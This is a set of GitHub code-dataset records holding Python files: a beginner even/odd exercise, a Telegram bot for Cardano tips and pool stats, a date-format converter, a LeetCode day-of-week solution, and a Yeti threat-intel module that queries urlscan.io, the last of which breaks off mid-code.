[0,0,0]\nblank.seen = 0\nblank.vis = {}\n\nname = blank","repo_name":"nsanthony/super-fortnight","sub_path":"wwk/py/rooms/room_directory/location_template.py","file_name":"location_template.py","file_ext":"py","file_size_in_byte":361,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"3436698577","text":"# Exercice 7 : Pair Ou Impair\n# Des Instructions\n# Écrivez un code qui demande à l'utilisateur un nombre et détermine si ce nombre est pair ou impair.\n\nnb1 = input(\"Enter un nombre : \")\nnb1 = int (nb1)\nif nb1 % 2 == 0:\n print(nb1,\" est paire\")\nelse :\n print(nb1,\" est impaire\")\n","repo_name":"RomaFirst/full-stack-coding-bootcam-ppython-full-time","sub_path":"Week_4/Days1/ExerciceXP/Exercice7.py","file_name":"Exercice7.py","file_ext":"py","file_size_in_byte":288,"program_lang":"python","lang":"fr","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"4969167543","text":"import logging\nimport os\nimport re\nimport secrets\nimport time\nfrom datetime import datetime, timedelta\n\nimport requests\nfrom telegram import InlineKeyboardButton, InlineKeyboardMarkup\n\nfrom . import database, utils\nfrom .replies import HTMLReplies\n\n\nclass CardaBotCallbacks:\n def __init__(self) -> None:\n self.base_url = os.environ.get(\"CARDABOT_API_URL\")\n self.cardabotdb = database.CardabotDB(self.base_url)\n self.ebs_pool = \"pool1ndtsklata6rphamr6jw2p3ltnzayq3pezhg0djvn7n5js8rqlzh\"\n self.headers = {\n \"Authorization\": \"Token \" + os.environ.get(\"CARDABOT_API_TOKEN\")\n }\n\n def _inform_error(self, context, chat_id):\n context.bot.send_message(\n chat_id=chat_id,\n text=\"Sorry, something went wrong 😔\",\n )\n\n def _setup_callback(func):\n \"\"\"Decorator to setup callback configs and handle exceptions.\"\"\"\n\n def callback(self, update, context):\n try:\n chat_id = update.effective_chat.id\n language = self.cardabotdb.get_chat_language(chat_id)\n html = HTMLReplies()\n html.set_language(language)\n func(self, update, context, html)\n\n except Exception as e:\n self._inform_error(context, chat_id)\n logging.exception(e)\n return\n\n return callback\n\n @_setup_callback\n def help(self, update, context, html: HTMLReplies = HTMLReplies()) -> None:\n update.message.reply_html(\n html.reply(\"help.html\", supported_languages=html.supported_languages)\n )\n\n @_setup_callback\n def start(self, update, context, html: HTMLReplies = HTMLReplies()) -> None:\n update.message.reply_html(html.reply(\"welcome.html\"))\n self.help(update, context)\n\n @_setup_callback\n def change_language(\n self, update, context, html: HTMLReplies = HTMLReplies()\n ) -> None:\n \"\"\"Change default language of the chat (/language).\"\"\"\n chat_id = update.effective_chat.id\n if update.effective_chat.type == \"group\":\n if not utils.user_is_adm(update, context):\n update.message.reply_html(html.reply(\"not_authorized.html\"))\n return\n\n if not context.args:\n # set language to default (EN) when no args are passed by the user\n default_language = html.default_lang\n html.set_language(default_language)\n self.cardabotdb.set_chat_language(chat_id, default_language)\n update.message.reply_html(html.reply(\"change_lang_success.html\"))\n return\n\n user_lang = \"\".join(context.args).upper()\n if html.set_language(user_lang):\n self.cardabotdb.set_chat_language(chat_id, user_lang)\n update.message.reply_html(html.reply(\"change_lang_success.html\"))\n else:\n update.message.reply_html(\n html.reply(\"change_lang_error.html\", user_lang=user_lang)\n )\n\n @_setup_callback\n def change_default_pool(\n self, update, context, html: HTMLReplies = HTMLReplies()\n ) -> None:\n \"\"\"Change default pool of the chat (/setpool).\"\"\"\n\n if update.effective_chat.type == \"group\":\n if not utils.user_is_adm(update, context):\n update.message.reply_html(html.reply(\"not_authorized.html\"))\n return\n\n chat_id = update.effective_chat.id\n if not context.args:\n # if there are no args, change default pool to `EBS`\n self.cardabotdb.set_default_pool(chat_id, self.ebs_pool)\n update.message.reply_html(html.reply(\"change_default_pool_success.html\"))\n return\n\n user_pool = \"\".join(context.args)\n self.cardabotdb.set_default_pool(chat_id, user_pool)\n update.message.reply_html(html.reply(\"change_default_pool_success.html\"))\n\n @_setup_callback\n def epoch_info(self, update, context, html: HTMLReplies = HTMLReplies()) -> None:\n \"\"\"Get information about the current epoch (/epoch).\"\"\"\n endpoint = \"epoch/\"\n url = os.path.join(self.base_url, endpoint)\n r = requests.get(url, headers=self.headers, params={\"currency_format\": \"ADA\"})\n r.raise_for_status() # captured by the _setup_callback decorator\n data = r.json().get(\"data\", None)\n\n template_args = {\n \"progress_bar\": utils.get_progress_bar(data.get(\"percentage\")),\n \"perc\": data.get(\"percentage\"),\n \"current_epoch\": data.get(\"current_epoch\"),\n \"current_slot\": data.get(\"current_slot\"),\n \"slot_in_epoch\": data.get(\"slot_in_epoch\"),\n \"txs_in_epoch\": data.get(\"txs_in_epoch\"),\n \"fees_in_epoch\": utils.fmt_ada(data.get(\"fees_in_epoch\")),\n \"active_stake\": utils.fmt_ada(data.get(\"active_stake\")),\n \"n_active_stake_pools\": data.get(\"n_active_stake_pools\"),\n \"remaining_time\": utils.fmt_time(\n timedelta(seconds=data.get(\"remaining_time\")),\n html.reply(\"days.html\"),\n ),\n }\n\n update.message.reply_html(html.reply(\"epoch_info.html\", **template_args))\n\n @_setup_callback\n def pool_info(self, update, context, html: HTMLReplies = HTMLReplies()):\n \"\"\"Get pool basic info (/pool).\"\"\"\n # get stake_id\n if context.args:\n stake_id = str(\"\".join(context.args))\n else:\n chat_id = update.effective_chat.id\n stake_id = self.cardabotdb.get_chat_default_pool(chat_id)\n\n update.message.reply_text(\"⌛ Fetching pool info, please wait...\")\n\n endpoint = f\"pool/{stake_id}\"\n url = os.path.join(self.base_url, endpoint)\n r = requests.get(url, headers=self.headers, params={\"currency_format\": \"ADA\"})\n\n # fmt: off\n if r.status_code == 404:\n template_args = {\"ticker\": stake_id}\n update.message.reply_html(html.reply(\"pool_info_error.html\", **template_args))\n return\n\n data = r.json().get(\"data\", None)\n\n template_args = {\n \"ticker\": data.get(\"ticker\"),\n \"name\": data.get(\"name\"),\n \"description\": data.get(\"description\"),\n \"homepage\": data.get(\"homepage\"),\n \"pool_id\": data.get(\"pool_id\"),\n \"pledge\": utils.fmt_ada(data.get(\"pledge\")),\n \"fixed_cost\": utils.fmt_ada(data.get(\"fixed_cost\")),\n \"margin\": data.get(\"margin\"),\n \"saturation\": data.get(\"saturation\"), # !TODO: fix\n \"saturation_symbol\": utils.get_saturation_icon(data.get(\"saturation\")), # !TODO: fix\n \"controlled_stake_perc\": data.get(\"controlled_stake_percentage\"), # !TODO: fix\n \"active_stake_amount\": utils.fmt_ada(data.get(\"active_stake_amount\")), # !TODO: fix\n \"delegators_count\": data.get(\"delegators_count\"),\n \"epoch_blocks_count\": data.get(\"epoch_blocks_count\"),\n \"lifetime_blocks_count\": data.get(\"lifetime_blocks_count\"),\n }\n # fmt: on\n\n update.message.reply_html(html.reply(\"pool_info.html\", **template_args))\n\n @_setup_callback\n def pots(self, update, context, html: HTMLReplies = HTMLReplies()):\n \"\"\"Get info about cardano pots (/pots).\"\"\"\n endpoint = \"pots/\"\n url = os.path.join(self.base_url, endpoint)\n r = requests.get(url, headers=self.headers, params={\"currency_format\": \"ADA\"})\n r.raise_for_status() # captured by the _setup_callback decorator\n data = r.json().get(\"data\", None)\n\n template_args = {\n \"treasury\": utils.fmt_ada(data.get(\"treasury\")),\n \"reserves\": utils.fmt_ada(data.get(\"reserves\")),\n \"fees\": utils.fmt_ada(data.get(\"fees\")),\n \"rewards\": utils.fmt_ada(data.get(\"rewards\")),\n \"utxo\": utils.fmt_ada(data.get(\"utxo\")),\n \"deposits\": utils.fmt_ada(data.get(\"deposits\")),\n }\n\n update.message.reply_html(html.reply(\"pots.html\", **template_args))\n\n @_setup_callback\n def netparams(self, update, context, html: HTMLReplies = HTMLReplies()):\n \"\"\"Get network parameters (/netparams).\"\"\"\n endpoint = \"netparams/\"\n url = os.path.join(self.base_url, endpoint)\n r = requests.get(url, headers=self.headers, params={\"currency_format\": \"ADA\"})\n r.raise_for_status() # captured by the _setup_callback decorator\n data = r.json().get(\"data\", None)\n\n template_args = {\n \"a0\": data.get(\"a0\"),\n \"min_pool_cost\": utils.fmt_ada(data.get(\"min_pool_cost\")),\n \"min_utxo_value\": data.get(\"min_utxo_value\"),\n \"n_opt\": data.get(\"n_opt\"),\n \"rho\": data.get(\"rho\"),\n \"tau\": data.get(\"tau\"),\n }\n\n update.message.reply_html(html.reply(\"netparams.html\", **template_args))\n\n @_setup_callback\n def netstats(self, update, context, html: HTMLReplies = HTMLReplies()):\n \"\"\"Get network statistics (/netstats).\"\"\"\n endpoint = \"netstats/\"\n url = os.path.join(self.base_url, endpoint)\n r = requests.get(url, headers=self.headers, params={\"currency_format\": \"ADA\"})\n r.raise_for_status() # captured by the _setup_callback decorator\n data = r.json().get(\"data\", None)\n\n template_args = {\n \"ada_in_circulation\": utils.fmt_ada(data.get(\"ada_in_circulation\")),\n \"percentage_in_stake\": data.get(\"percentage_in_stake\"),\n \"stakepools\": data.get(\"stakepools\"),\n \"delegations\": data.get(\"delegations\"),\n \"load_15m\": data.get(\"load_15m\"),\n \"load_1h\": data.get(\"load_1h\"),\n \"load_24h\": data.get(\"load_24h\"),\n }\n\n update.message.reply_html(html.reply(\"netstats.html\", **template_args))\n\n def _get_cardabot_user_id(self, chat_id: str | int) -> int:\n \"\"\"Return the cardabor user id for the given chat_id.\n\n If chat is not connected, return None.\n \"\"\"\n res = requests.get(\n os.path.join(self.base_url, f\"chats/{chat_id}/\"),\n headers=self.headers,\n params={\"client_filter\": \"TELEGRAM\"},\n )\n res.raise_for_status()\n\n return res.json().get(\"cardabot_user_id\", None)\n\n def _get_cardabot_user_address(self, user_id: int) -> str:\n \"\"\"Return the cardabot user address for the given user_id.\n \"\"\"\n res = requests.get(\n os.path.join(self.base_url, f\"users/{user_id}/\"),\n headers=self.headers,\n params={\"client_filter\": \"TELEGRAM\"},\n )\n res.raise_for_status()\n\n return res.json().get(\"stake_key\", None)\n\n\n @_setup_callback\n def connect(self, update, context, html: HTMLReplies = HTMLReplies()):\n \"\"\"Connect user wallet\"\"\"\n chat_id = update.effective_chat.id\n\n # only allow private chats\n if update.effective_chat.type != \"private\":\n update.message.reply_html(html.reply(\"connection_refused.html\"))\n return\n\n ## Get token from chat_id\n r = requests.get(\n os.path.join(self.base_url, f\"chats/{chat_id}/token/\"),\n headers=self.headers,\n params={\"client_filter\": \"TELEGRAM\"},\n )\n r.raise_for_status() # captured by the _setup_callback decorator\n tmp_token = r.json().get(\"tmp_token\", None)\n\n ## Create unique URL for user\n cardabot_url = self.base_url.replace(\"api/\", \"\")\n connect_url_link = f\"{cardabot_url}connect?token={tmp_token}\"\n\n message = context.bot.send_message(\n chat_id=chat_id,\n text=f\"⬇️ Click the button below to connect your web wallet to CardaBot, so you can starting tipping\",\n reply_markup=InlineKeyboardMarkup(\n [\n [\n InlineKeyboardButton(\n text=\"🔗 Connect Wallet\",\n url=connect_url_link,\n )\n ],\n [\n InlineKeyboardButton(\n text=\"📖 Learn more\",\n url=\"https://cardabot.app/faq/\",\n )\n ],\n ]\n ),\n )\n\n # task to run for a couple of minutes or until the user connects his wallet\n def update_message(message, cardabot_user, chat_id, job_id):\n cardabot_user_id = self._get_cardabot_user_id(chat_id)\n stake_addr = self._get_cardabot_user_address(cardabot_user_id)\n if cardabot_user_id != None:\n message.edit_text(\n html.reply(\"connection_success.html\", stake_address=stake_addr), parse_mode=\"HTML\"\n )\n utils.Scheduler.queue.remove_job(job_id)\n\n start_date = datetime.now() + timedelta(seconds=20)\n end_date = start_date + timedelta(seconds=7 * 60)\n job_id = secrets.token_urlsafe(6) # generate tmp id for the job\n utils.Scheduler.queue.add_job( # add job to scheduler\n update_message,\n \"interval\",\n seconds=10,\n start_date=start_date,\n end_date=end_date,\n args=[message, self._get_cardabot_user_id(chat_id), chat_id, job_id],\n id=job_id,\n )\n\n def ebs(self, update, context) -> None:\n update.message.reply_text(\n \"🔔 Follow us on social media!\",\n #\n reply_markup=InlineKeyboardMarkup(\n [\n [\n InlineKeyboardButton(\n text=\"✨ Twitter ✨\", url=\"https://twitter.com/EveryBlockStd\"\n )\n ],\n [\n InlineKeyboardButton(\n text=\"✨ Instagram ✨\",\n url=\"https://instagram.com/EveryBlockStudio\",\n )\n ],\n [\n InlineKeyboardButton(\n text=\"✨ LinkedIn ✨\",\n url=\"https://www.linkedin.com/company/everyblock-studio/\",\n )\n ],\n [\n InlineKeyboardButton(\n text=\"✨ Telegram ✨\",\n url=\"https://t.me/EveryBlockStudio\",\n )\n ],\n [\n InlineKeyboardButton(\n text=\"✨ Discord ✨\",\n url=\"https://discord.gg/dxNSXpvS9W\",\n )\n ],\n ]\n ),\n )\n\n def _get_network(self) -> str:\n \"\"\"Return the network name\"\"\"\n network = os.environ.get(\"NETWORK\", \"mainnet\").lower()\n if network not in (\"mainnet\", \"testnet\"):\n raise ValueError(\"Invalid network environment variable!\")\n\n return network\n\n @_setup_callback\n def tip(self, update, context, html: HTMLReplies = HTMLReplies()):\n \"\"\"Tip a user\"\"\"\n if update.message.reply_to_message is None:\n # only allow tip if msg is a response to a user\n update.message.reply_html(html.reply(\"tip_refused.html\"))\n return\n\n txt = update.message.text.split()\n lbound = utils.min_ada()\n if not (len(txt) == 2 and utils.isnumber(txt[1]) and float(txt[1]) > lbound):\n update.message.reply_html(html.reply(\"tip_refused.html\"))\n return\n\n # make sure to create chat_ids for recipient and sender\n self.cardabotdb.get_or_create_chat(int(update.message.from_user.id))\n self.cardabotdb.get_or_create_chat(int(update.message.reply_to_message.from_user.id))\n\n # get data for building tx\n data = {\n \"chat_id_sender\": update.message.from_user.id,\n \"chat_id_receiver\": update.message.reply_to_message.from_user.id,\n \"username_receiver\": update.message.reply_to_message.from_user.username,\n \"amount\": float(txt[1]),\n \"client\": \"TELEGRAM\",\n }\n\n # call cardabot-api to build the tx (get tx_id)\n r = requests.post(\n os.path.join(self.base_url, \"unsignedtx/\"), headers=self.headers, data=data\n )\n\n # verify the tx response\n if r.status_code >= 400:\n message = update.message.reply_text(\n r.json().get(\"detail\", None)\n ) # TODO: improve this, should be an html reply\n return\n\n if r.status_code != 201:\n update.message.reply_text(\"💰 Tip failed!\\n\\n\")\n return\n\n tx_id = r.json().get(\"tx_id\")\n # create a link to sign the tx\n cardabot_url = self.base_url.replace(\"api/\", \"\")\n pay_url_link = f\"{cardabot_url}pay?tx_id={tx_id}\"\n\n # create message with a button to send the tx\n message = update.message.reply_text(\n # chat_id=update.effective_chat.id,\n text=\"⬇️ Click the button below to sign your transaction using your web wallet:\",\n reply_markup=InlineKeyboardMarkup(\n [\n [\n InlineKeyboardButton(\n text=\"🔑 Sign Tx\",\n url=pay_url_link,\n )\n ],\n [\n InlineKeyboardButton(\n text=\"📖 Learn more\",\n url=\"https://cardabot.app/faq/\",\n )\n ],\n ]\n ),\n )\n\n # task to run for a couple of minutes or until the tx is submitted to network\n def update_message(message, tx_id, network, job_id, end_date):\n r = requests.get(\n os.path.join(self.base_url, f\"checktx/{tx_id}/\"),\n headers=self.headers,\n )\n\n if r.status_code != 200:\n if datetime.now() > end_date - timedelta(seconds=30):\n message.edit_text(\n text=html.reply(\"tip_fail.html\"), parse_mode=\"HTML\"\n )\n utils.Scheduler.queue.remove_job(job_id)\n return\n\n net = network + \".\" if network == \"testnet\" else \"\"\n message.edit_text(\n text=\"✅ Your transaction was submitted!\",\n reply_markup=InlineKeyboardMarkup(\n [\n [\n InlineKeyboardButton(\n text=\"Check Tx on CardanoScan\",\n url=f\"https://{net}cardanoscan.io/transaction/{tx_id}\",\n )\n ],\n ]\n ),\n )\n utils.Scheduler.queue.remove_job(job_id)\n\n start_date = datetime.now() + timedelta(seconds=1)\n end_date = start_date + timedelta(seconds=600)\n job_id = secrets.token_urlsafe(6) # generate tmp id for the job\n utils.Scheduler.queue.add_job( # add job to scheduler\n update_message,\n \"interval\",\n seconds=30,\n start_date=start_date,\n end_date=end_date,\n args=[message, tx_id, self._get_network(), job_id, end_date],\n id=job_id,\n )\n\n def _get_all_cardabot_chats(self) -> list[str]:\n \"\"\"Get all cardabot chats from database, excluding groups.\"\"\"\n r = requests.get(\n os.path.join(self.base_url, \"chats/\"),\n headers=self.headers,\n params={\"client_filter\": \"TELEGRAM\"},\n )\n r.raise_for_status()\n\n chat_ids = [\n chat.get(\"chat_id\") for chat in r.json() if int(chat.get(\"chat_id\")) > 0\n ] # exclude telegram group chats\n\n return chat_ids\n\n @_setup_callback\n def alert(self, update, context, html: HTMLReplies = HTMLReplies()):\n \"\"\"Send a message to all users.\"\"\"\n sender_chat_id = os.environ.get(\"ADMIN_CHAT_ID\")\n if str(update.effective_user.id) != sender_chat_id:\n update.message.reply_html(html.reply(\"endpoint_refused.html\"))\n return\n\n message = update.message.text.split(\" \", 1)[1]\n chat_ids = self._get_all_cardabot_chats()\n\n utils.send_to_all(bot=context.bot, chat_ids=chat_ids, text=message)\n\n def end_of_epoch_task(self, bot) -> None:\n \"\"\"Send of epoch summary to all users.\"\"\"\n html = HTMLReplies()\n endpoint = \"epochsummary/\"\n url = os.path.join(self.base_url, endpoint)\n r = requests.get(url, headers=self.headers, params={\"currency_format\": \"ADA\"})\n r.raise_for_status() # captured by the _setup_callback decorator\n data = r.json().get(\"data\", None)\n\n template_args = {\n \"epoch\": data.get(\"epoch\", None),\n \"blocks\": data.get(\"blocks\", None),\n \"txs\": data.get(\"txs\", None),\n \"fees\": utils.fmt_ada(data.get(\"fees\", None)),\n \"reserves\": utils.fmt_ada(data.get(\"reserves\", None)),\n \"treasury\": utils.fmt_ada(data.get(\"treasury\", None)),\n }\n\n message = html.reply(\"end_of_epoch_summary.html\", **template_args)\n chat_ids = self._get_all_cardabot_chats() #TODO: exclude users that have disabled the bot messages\n logging.info(\"Sending end of epoch summary message to: %s\", chat_ids)\n utils.send_to_all(bot=bot, chat_ids=chat_ids, text=message, parse_mode=\"HTML\")\n\n @_setup_callback\n def claim(self, update, context, html: HTMLReplies = HTMLReplies()):\n \"\"\"Claim user funds that are being held temporarily.\"\"\"\n update.message.reply_text(f\"⌛️ We're transfering your funds, please wait...\")\n\n chat_id = update.message.from_user.id\n r = requests.post(\n os.path.join(self.base_url, \"claim/\"),\n headers=self.headers,\n params={\"client_filter\": \"TELEGRAM\"},\n data={\"chat_id_receiver\": chat_id},\n )\n\n if r.status_code == 406 or r.status_code == 404:\n message = update.message.reply_text(\n r.json().get(\"detail\", None)\n ) # TODO: improve this, should be an html reply\n return\n else:\n r.raise_for_status()\n\n network = self._get_network()\n net = network + \".\" if network == \"testnet\" else \"\"\n update.message.reply_text(\n text=\"✅ Your funds were successfuly transfered to you!\",\n reply_markup=InlineKeyboardMarkup(\n [\n [\n InlineKeyboardButton(\n text=\"Check Tx on CardanoScan\",\n url=f\"https://{net}cardanoscan.io/transaction/{r.json().get('tx_id')}\",\n )\n ],\n ]\n ),\n )\n return\n\n @_setup_callback\n def balance(self, update, context, html: HTMLReplies = HTMLReplies()):\n \"\"\"Get user balance.\"\"\"\n chat_id = update.message.from_user.id\n\n r = requests.get(\n os.path.join(self.base_url, f\"chats/{chat_id}/balance/\"),\n headers=self.headers,\n params={\"client_filter\": \"TELEGRAM\"},\n )\n r.raise_for_status()\n\n update.message.reply_html(html.reply(\"chat_balance.html\", **r.json()))\n return\n","repo_name":"EveryBlockStudio/cardabot-telegram","sub_path":"cardabot_telegram/callbacks.py","file_name":"callbacks.py","file_ext":"py","file_size_in_byte":23569,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"21"} +{"seq_id":"40587169711","text":"\nfrom tkinter.tix import InputOnly\nfrom xml.sax import default_parser_list\nimport numpy as np\nimport pandas as pd\nimport re\nimport chardet\nfrom datetime import datetime\n\nclass DATin(object):\n\n def __init__(self, path, colname):\n self._path = path\n self._colname = colname # 日期的字段\n if self._path.endswith(\".csv\"):\n f = open(self._path, \"rb\") # 判断字元\n data = f.read()\n self.dfold = pd.read_csv(\n self._path, encoding=chardet.detect(data)[\"encoding\"])\n else:\n self.dfold = pd.read_excel(self._path, header=0, sheet_name=0)\n\n @property\n def path(self):\n return self._path\n\n @property\n def colname(self):\n return self._colname\n\n def df_origin(self):\n return self.dfold\n\n def pickup(self):\n \"\"\"取出日期列\"\"\"\n datlist = self.dfold[self._colname]\n iconlist = r\"[年月,/\\-\\.]\" # 用正则表达是,需要判别的符号\n datedf = pd.DataFrame(columns=['Year', 'Month', 'Day'])\n n = 0\n \"\"\" 先判别民国年OR西元年\"\"\"\n for i in datlist:\n YMD = [\"\", \"\", \"\"]\n i = str(i)\n \n try:\n # 判断是否可转为数字\n i = int(i)\n # 判断是否为excel 日期数字\n \n if i <60000 and i >30000:\n dt = datetime.fromordinal(datetime(1900, 1, 1).toordinal() + i - 2) \n tt = dt.timetuple()\n \n YMD= [str(tt.tm_year),str(tt.tm_mon),str(tt.tm_mday)]\n if len(YMD[1]) == 1:\n YMD[1] = \"0\"+YMD[1]\n if len(YMD[2]) == 1:\n YMD[2] = \"0\"+YMD[2]\n \n \n # 为单纯年月日的形式\n else:\n i = str(i)\n if int(i[0:2]) < 17:\n \"\"\"转换百位民国年(100年后)为西元年\"\"\"\n i = str(1911+int(i[0:3]))+i[3:]\n\n elif int(i[0:2]) > 21:\n \"\"\"转换十位民国年(99年前)为西元年\"\"\"\n i = str(1911+int(i[0:2]))+i[2:]\n \n YMD[0] = i[0:4]\n \n if len(i) == 8:\n YMD[1] = i[4:6]\n YMD[2] = i[6:]\n # 仅六码\n elif len(i) == 6:\n if int(i[4:6]) <= 12:\n YMD[1] = i[4:6]\n else:\n YMD[1] = \"0\"+i[4]\n YMD[2] = \"0\"+i[5]\n elif len(i) == 5:\n YMD[1] = \"0\"+i[4]\n # 有七码\n else:\n if i[4] != \"1\":\n YMD[1] = \"0\"+i[4]\n YMD[2] = i[5:7]\n else:\n # 无法判别时加上error\n YMD[1] = i[4:7]\n YMD[2] = \"error\"\n \n\n except:\n # 有分隔符号的形式----------------------------------------------------------------------\n # 前置更换 西元 民国 前两个数字的大小来判断\n if int(i[0:2]) < 17:\n \"\"\"转换百位民国年(100年后)为西元年\"\"\"\n i = str(1911+int(i[0:3]))+i[3:]\n\n elif int(i[0:2]) > 21:\n \"\"\"转换十位民国年(99年前)为西元年\"\"\"\n i = str(1911+int(i[0:2]))+i[2:]\n\n \"\"\"判断有无转分割符号>>>>年月日,/\\-.\"\"\"\n if re.search(iconlist, i):\n i = re.sub(r\"[日]\", \"\", i) # 先去除 日 避免造成多出的空格\n YMD = re.split(iconlist, i)\n if len(YMD) < 3:\n YMD.append(\"\")\n \"\"\"输出日月年的\"\"\"\n \"\"\"若日月为个位数则加0\"\"\"\n if len(YMD[1]) == 1:\n YMD[1] = \"0\"+YMD[1]\n if len(YMD[2]) == 1:\n YMD[2] = \"0\"+YMD[2]\n \n \n datedf.loc[n, ] = YMD\n \n n += 1\n # 输出年月日的dataframe\n return datedf\n\n\nclass DATout(object):\n def __init__(self, datadf, split_icon=\"\", yearform=\"西元年\"):\n self._split_icon = split_icon\n # 决定分隔符号\n self._yearform = yearform\n # 年份形式预设西元年\n self._datadf = datadf\n # DATin 输入的日月年表格\n self.datelist = []\n\n def combine(self):\n for i in range(0, len(self._datadf)):\n # 若是民国年则转换\n if self._yearform == \"民国年\":\n self._datadf.loc[i, \"Year\"] = str(\n int(self._datadf.loc[i, \"Year\"])-1911)\n # 我们透过for循环一行来判断说 x 是否有值 如果没有则不加入到新的字串内\n\n if self._split_icon != \"年月日\": # 判断是否选择年月日连接,若为一般符号,直接相连\n # 以 join 加 if 的判断式,若 日 为空格 则不加入\n combinelist = self._split_icon.join(\n t for t in self._datadf.loc[i] if t)\n\n elif self._split_icon == \"年月日\": # 判断是否选择年月日连接,若为年月日,另外相连\n if self._datadf.loc[i, \"Day\"]: # 以 join 加 if 的判断式,若 日 为空格 则不加入 日\n combinelist = self._datadf.loc[i, \"Year\"]+\"年\" + \\\n self._datadf.loc[i, \"Month\"]+\"月\" + \\\n self._datadf.loc[i, \"Day\"]+\"日\"\n else:\n combinelist = self._datadf.loc[i, \"Year\"] + \\\n \"年\"+self._datadf.loc[i, \"Month\"]+\"月\"\n\n self.datelist.append(combinelist)\n\n return self.datelist\n\n\ndef main():\n path = input(\"输入档案路径:\")\n colname = input(\"日期所在的字段名:\")\n #path2 = input(\"输出档案路径:\")\n #yearform = input(\"民国年\")\n #split_icon = input(\"/\")\n\n date_c = DATin(path, colname) # 进入DATin 运算,创造转型后data\n date_output_form = DATout(date_c.pickup(), \"年月日\", \"民国年\")\n\n date_output = date_c.df_origin()\n date_output[colname] = date_output_form.combine()\n\n date_output.to_excel(\"D:\\Desktop\\日期.xlsx\")\n\n\nif __name__ == '__main__':\n main()\n# D:\\Desktop\\date_test.xlsx \n# date","repo_name":"dudunoyume/DATE","sub_path":"DATE.py","file_name":"DATE.py","file_ext":"py","file_size_in_byte":6795,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"73888429812","text":"class Solution:\n def dayOfTheWeek(self, day: int, month: int, year: int) -> str:\n def isleap(year):\n if year % 4 != 0:\n return False\n elif year % 100 != 0:\n return True\n elif year % 400 != 0:\n return False\n else:\n return True\n daysinmonth = [31, 28, 31, 30, 31, 30, 31, 31, 30, 31, 30, 31]\n daysinweek = [\"Sunday\", \"Monday\", \"Tuesday\", \"Wednesday\", \"Thursday\", \"Friday\", \"Saturday\"]\n # 1971,1,1 - Friday\n diff = 5\n for y in range(1971, year):\n if isleap(y): \n diff += 366\n else: \n diff += 365\n for m in range(0, month-1):\n diff += daysinmonth[m]\n if month >= 2 and isleap(year):\n diff += 1\n diff += day - 1\n print(diff)\n return daysinweek[diff % 7]\n\nif __name__ == '__main__':\n s = Solution()\n print(s.dayOfTheWeek())","repo_name":"xiaofanc/leetcode","sub_path":"1185-day-of-the-week.py","file_name":"1185-day-of-the-week.py","file_ext":"py","file_size_in_byte":981,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"42344713323","text":"import json\nimport logging\n\nimport requests\n\nfrom core.analytics import OneShotAnalytics\nfrom core.config.config import yeti_config\nfrom core.errors import GenericYetiError, ObservableValidationError\nfrom core.observables import AutonomousSystem, Hostname, Ip, Text, Url\n\n\nclass UrlScanIoApi(object):\n \"\"\"\n https://urlscan.io/about-api/\n \"\"\"\n\n API_URL = \"https://urlscan.io/api/v1/search/\"\n\n @staticmethod\n def _process_asn_data(page, observable):\n links = set()\n if page[\"page\"].get(\"asn\"):\n asn = AutonomousSystem.get_or_create(\n value=page[\"page\"][\"asn\"].replace(\"AS\", \"\")\n )\n links.update(asn.active_link_to(observable, \"asn#\", \"UrlScanIo Query\"))\n\n if page[\"page\"].get(\"asnname\"):\n asnname = Text.get_or_create(value=page[\"page\"][\"asnname\"])\n links.update(\n asnname.active_link_to(\n observable, \"asn_name\", \"UrlScanIoQuerycanIo Query\"\n )\n )\n\n if page[\"page\"].get(\"server\"):\n server = Text.get_or_create(value=page[\"page\"][\"server\"])\n links.update(server.active_link_to(observable, \"server\", \"UrlScanIo Query\"))\n\n return list(links)\n\n @staticmethod\n def _process_data(json_result, observable):\n links = set()\n\n for page in json_result:\n if not page.get(\"page\"):\n continue\n\n # IP iocs has more data than the rest\n if not isinstance(observable, Ip) and page[\"page\"].get(\"ip\"):\n try:\n ip = page[\"page\"][\"ip\"]\n new_ip = Ip.get_or_create(value=ip)\n new_ip.add_context({\"source\": \"UrlScanIo\"})\n links.update(\n new_ip.active_link_to(observable, \"ip\", \"UrlScanIo Query\")\n )\n except ObservableValidationError:\n logging.error(\"This ip address is not valid %s\" % ip)\n\n if not isinstance(observable, Hostname) and page[\"page\"].get(\"domain\"):\n try:\n hostname = page[\"page\"][\"domain\"]\n new_host = Hostname.get_or_create(value=hostname)\n new_host.add_context({\"source\": \"UrlScanIo\"})\n links.update(\n new_host.active_link_to(\n observable, \"hostname\", \"UrlScanIo Query\"\n )\n )\n except ObservableValidationError:\n logging.error(\"This hostname not valid: %s\" % hostname)\n\n if not isinstance(observable, Url) and page[\"page\"].get(\"url\"):\n try:\n url = page[\"page\"][\"url\"]\n new_url = Url.get_or_create(value=url)\n new_url.add_context({\"source\": \"UrlScanIo\"})\n links.update(\n new_url.active_link_to(observable, \"url\", \"UrlScanIo Query\")\n )\n except ObservableValidationError:\n logging.error(\"This url is not valid %s\" % url)\n\n links.update(UrlScanIoApi._process_asn_data(page, observable))\n\n @staticmethod\n def fetch(observable):\n types = {\n \"ip\": 'ip:\"{}\"',\n \"hostname\": 'domain:\"{}\"',\n \"hash\": 'hash:\"{}\"',\n }\n\n params = {\"q\": types[observable.type].format(observable.value)}\n try:\n response = requests.get(\n UrlScanIoApi.API_URL, params=params, proxies=yeti_config.proxy\n )\n if not response.ok:\n raise GenericYetiError(\"Status code: \".format(response.status_code))\n\n if response.json().get(\"total\", 0) > 0:\n return response.json()[\"results\"]\n\n return None\n except Exception as e:\n raise GenericYetiError(\n \"Hit an error checking {},{}\".format(observable.value, e)\n )\n\n\nclass UrlScanIoQuery(OneShotAnalytics, UrlScanIoApi):\n default_values = {\n \"name\": \"UrlScanIo\",\n \"description\": \"Perform a UrlScanIo query.\",\n }\n # 'Url', url search doesn't work right now\n ACTS_ON = [\"Ip\", \"Hostname\", \"Hash\"]\n\n def analyze(self, observable, results):\n links = list()\n json_result = UrlScanIoApi.fetch(observable)\n\n if json_result is not None:\n json_string = json.dumps(\n json_result, sort_keys=True, indent=4, separators=(\",\", \": \")\n )\n results.update(raw=json_string)\n links = UrlScanIoApi._process_data(json_result, observable)\n context = {\"raw\": json_string, \"source\": self.name}\n observable.add_context(context)\n\n return 